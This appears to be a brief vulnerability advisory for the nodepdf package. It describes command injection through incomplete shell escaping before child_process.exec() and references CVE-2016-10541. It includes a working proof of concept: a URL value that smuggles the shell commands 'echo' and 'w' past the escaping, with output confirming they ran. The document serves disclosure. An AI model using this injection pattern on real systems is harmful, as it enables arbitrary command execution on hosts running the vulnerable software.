Software: nodepdf
Website: https://github.com/TJkrusinski/NodePDF

Input passed to the Pdf() function is shell escaped and passed to child_process.exec() during PDF rendering. However, the shell escape does not properly encode all special characters, namely, semicolon and curly braces. This can be abused to achieve command execution.

This vulnerability was later fixed in the shell-escape library and assigned the identifier CVE-2016-10541.

var nodepdf = require('nodepdf');
var url = ";{echo,hello,world};w";
var filename = "output.pdf";
var pdf = new nodepdf(url, filename, {});
pdf.on('stdout', console.log);
pdf.on('stderr', console.error);
$ npm install [email protected]
$ node render.js
11 incorrect args
hello world
 03:31:25 up 19 days, 16 min,  1 user,  load average: 0.15, 0.15, 0.10
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
user     pts/0    192.168.1.64     02:38    0.00s  0.31s  0.00s w